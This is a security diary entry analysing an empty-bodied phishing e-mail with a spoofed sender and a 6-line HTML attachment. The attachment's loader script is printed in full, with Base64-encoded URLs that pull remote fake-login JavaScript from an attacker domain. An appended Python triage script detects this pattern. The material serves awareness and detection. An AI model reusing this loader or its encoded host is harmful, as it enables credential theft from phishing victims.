Internet Storm Center Diary 2023-08-31
Those of us who teach security awareness courses are sometimes asked “Why would someone target ME?” or “Why would someone target OUR organization?”. Although these sentiments aren’t nearly as common as they used to be, since even mainstream media seem to cover cyber-attacks on at least a weekly basis, and – consequently – even non-IT specialists are becoming aware of the ubiquity of cyber-attacks, such questions still come up, both when teaching “regular” employees as well as when it comes to board-level security trainings.
To my mind, the old proverb “opportunity makes the thief” describes the main issue with cybercrime quite well – the internet is a very “target-rich” environment, and it is extremely easy and cheap to create a simple piece of malicious code or launch a basic attack. These low costs mean that when it comes to generic attacks, threat actors don’t discriminate, and they target practically everyone, and nothing demonstrates this better than generic, “un-targeted” phishing e-mails.
It is, of course, true that most generic phishing messages will be – either immediately or very soon after they are delivered to their first recipients – detected and blocked by any security solution worth the name; however, if even one in a thousand or ten thousand e-mails leads to a recipient downloading a malicious file or typing valid credentials into a phishing website, sending such messages out is still a worthwhile endeavor from the threat actors’ perspective. The fact that their creations are quickly being blocked is not necessarily significant, since the cost of modifying a phishing message or its attachment, or of creating a new one, is quite low.
A few weeks ago, I came across a phishing message which seemed to me to be a literal manifestation of this “cheap and simple” approach.
The e-mail in question was sent with a spoofed sender address in its header, making it look like it came from the recipient himself. Although this meant that it would be blocked or quarantined if DMARC was properly set up for the recipient’s domain, it also meant that if DMARC (or another similar filtering mechanism) wasn’t in place and the e-mail made it to the recipient’s inbox, Outlook (and potentially other clients too) might “helpfully” display a photo of the recipient as the sender, should the photo be available as part of the contact information, thus making the e-mail look more trustworthy.
As you can see, the message subject mentioned a received voice call and the body of the e-mail was left completely empty – so far (apart from the spoofed sender address), it was as basic as a malicious e-mail could be. But what made the “simple and cheap” theme complete was the HTML attachment, which only contained the following 6 lines.
<script>
var iam = "[name]@[domain].com";
var gate = "aHR0cHM6Ly9kb25ld2VsbGJ5d2VsbC5jb20vZW5lcmFsLnBocA==";
var crea8 = "aHR0cHM6Ly9kb25ld2VsbGJ5d2VsbC5jb20vcGFnZS5qcw==";
document.write('<script src="'+atob(crea8)+'"></script>');
</script>
The gate variable contained the Base64-encoded URL hxxps[://]donewellbywell[.]com/eneral[.]php and the crea8 variable contained the encoded URL hxxps[://]donewellbywell[.]com/page[.]js. The domain mentioned in the two URLs was registered only two days before the e-mail was sent[1], which seems to indicate that it was intended to be a disposable domain used (primarily) in this campaign… Which agrees well with the “it’s cheap to do cybercrime” theme.
It probably won’t come as a surprise to you that the JavaScript loaded from the external URL was supposed to display a fake Microsoft login prompt.
Although the JavaScript loaded from the external domain was not as simple as the rest of the attack (it was heavily obfuscated and “weighed in” at 155 kB) and it might therefore seem that it went against the “cheap and simple” approach, the fact that it was hosted externally allowed for it to be reused between campaigns… Which is what the threat actors did – on VirusTotal, one can see that the same JavaScript file has been in use since at least May of this year[2]. Therefore, even if development of the file (or its purchase) might have been somewhat more costly than the rest of the attack, through reuse it could pay for itself in the long run…
As we can see from this small example, in 2023 it still makes sense for threat actors to send out an obviously suspicious 6-line HTML file in an empty e-mail with a spoofed sender address… Proving that the cost of committing cybercrime can be really low.
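The two traits of this attachment that a mail gateway or an analyst can key on are Base64 string literals that decode to URLs and a document.write() that injects a remote script through atob(). The following Python triage script is an added example (not code from the diary); it runs over a constructed copy of the 6-line attachment using the two Base64 strings quoted above and reports the hidden URLs in the same defanged notation the diary uses.

```python
import base64
import re

# Constructed sample modelled on the 6-line HTML attachment described in the diary;
# the two Base64 literals are the ones quoted there, the address is a placeholder.
SAMPLE_ATTACHMENT = """<script>
var iam = "victim@example.com";
var gate = "aHR0cHM6Ly9kb25ld2VsbGJ5d2VsbC5jb20vZW5lcmFsLnBocA==";
var crea8 = "aHR0cHM6Ly9kb25ld2VsbGJ5d2VsbC5jb20vcGFnZS5qcw==";
document.write('<script src="'+atob(crea8)+'"></script>');
</script>"""

# Quoted literals made only of Base64 characters and long enough to hold a URL.
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{16,}={0,2})["\']')
URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.IGNORECASE)


def defang(url: str) -> str:
    """Render a URL as hxxp / [.] so it cannot be clicked by accident."""
    scheme, rest = url.split("://", 1)
    return scheme.replace("http", "hxxp") + "[://]" + rest.replace(".", "[.]")


def decode_hidden_urls(html: str) -> list[str]:
    """Decode every Base64 literal and return the defanged URLs found inside, in source order."""
    found = []
    for literal in B64_LITERAL.findall(html):
        try:
            text = base64.b64decode(literal, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64, or not text: ignore the literal
        found.extend(defang(u) for u in URL_RE.findall(text))
    return found


def triage(html: str) -> dict:
    """Summarise the indicators an analyst would want from an HTML attachment."""
    urls = decode_hidden_urls(html)
    writes_remote_script = bool(
        re.search(r'document\.write\s*\(.*<script\s+src=', html, re.DOTALL))
    uses_atob = "atob(" in html
    return {
        "hidden_urls": urls,
        "remote_script_via_atob": writes_remote_script and uses_atob,
        "line_count": len(html.strip().splitlines()),
        "suspicious": bool(urls) and writes_remote_script and uses_atob,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_ATTACHMENT).items():
        print(f"{key}: {value}")
```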
[1] https://whois.domaintools.com/donewellbywell.com
[2] https://www.virustotal.com/gui/file/a7e17ecb0fa26f589bad906ed411af2142fbf9668841f7af613fcb861a672961/relations
———–
Jan Kopriva
@jk0pr
Nettles Consulting